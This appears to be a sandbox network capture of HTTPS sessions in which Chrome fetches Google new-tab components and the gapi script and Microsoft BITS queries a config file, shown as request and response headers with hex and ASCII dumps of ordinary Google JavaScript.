                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                1192.168.2.549714142.250.186.1004431436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC526OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Version: 689118238
                                                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:10 GMT
                                                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC336INData Raw: 31 63 66 63 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 31 64 20 67 62 5f 50 65 20 67 62 5f 70 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1cfc)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_1d gb_Pe gb_pd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC1378INData Raw: 20 67 62 5f 6e 64 20 67 62 5f 45 64 20 67 62 5f 6b 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 20 67 62 5f 71 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: gb_nd gb_Ed gb_kd\"\u003e\u003cdiv class\u003d\"gb_vd gb_qd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC1378INData Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 74 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76
                                                                                                                                                                                                                                                                                                                                Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_vd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_td\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_v
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC1378INData Raw: 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: vg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC1378INData Raw: 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC1378INData Raw: 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 36 33 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700263,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(f
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC202INData Raw: 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 59 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 59 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 57 67 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 5b 57 64 28 5c 22 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: is.trustedTypes;_.Yd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Zd\u003dnew _.Yd(\"about:invalid#zClosurez\");_.Vd\u003dclass{constructor(a){this.Wg\u003da}};_.$d\u003d[Wd(\"
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC372INData Raw: 31 36 64 0d 0a 64 61 74 61 5c 22 29 2c 57 64 28 5c 22 68 74 74 70 5c 22 29 2c 57 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 57 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 57 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 56 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 61 65 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 6e 65 77 20 5f 2e 61 65 28 5f 2e 58 64 3f 5f 2e 58 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44
                                                                                                                                                                                                                                                                                                                                Data Ascii: 16ddata\"),Wd(\"http\"),Wd(\"https\"),Wd(\"mailto\"),Wd(\"ftp\"),new _.Vd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.ae\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.be\u003dnew _.ae(_.Xd?_.Xd.emptyHTML:\"\");\n}catch(e){_._D
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC1378INData Raw: 38 30 30 30 0d 0a 76 6f 69 64 20 30 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 66 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 65 65 29 72 65 74 75 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: 8000void 0};_.de\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a|0:void 0};fe\u003dfunction(){let a\u003dnull;if(!ee)retur
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC1378INData Raw: 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 42 62 28 5f 2e 72 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 42 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 65 65 5c 75 30 30 33 64 5f 2e 58 64 3b 5f 2e 69 65 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c
                                                                                                                                                                                                                                                                                                                                Data Ascii: nction(a,b,c\u003d0){return _.Bb(_.re(a,b),c)};_.se\u003dfunction(a,b,c\u003d0){return _.Bb(_.S(a,b),c)};_.ue\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};ee\u003d_.Xd;_.ie\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                2192.168.2.549713142.250.186.1004431436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC957INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Version: 689118238
                                                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:10 GMT
                                                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                3192.168.2.549721184.28.90.27443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:13 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=157447
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:13 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                X-CID: 2


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                4192.168.2.549723142.250.186.784431436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC741OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: apis.google.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC913INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                                                                Content-Length: 117949
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Server: sffe
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 20:58:20 GMT
                                                                                                                                                                                                                                                                                                                                Expires: Tue, 28 Oct 2025 20:58:20 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Age: 234
                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                Connection: close
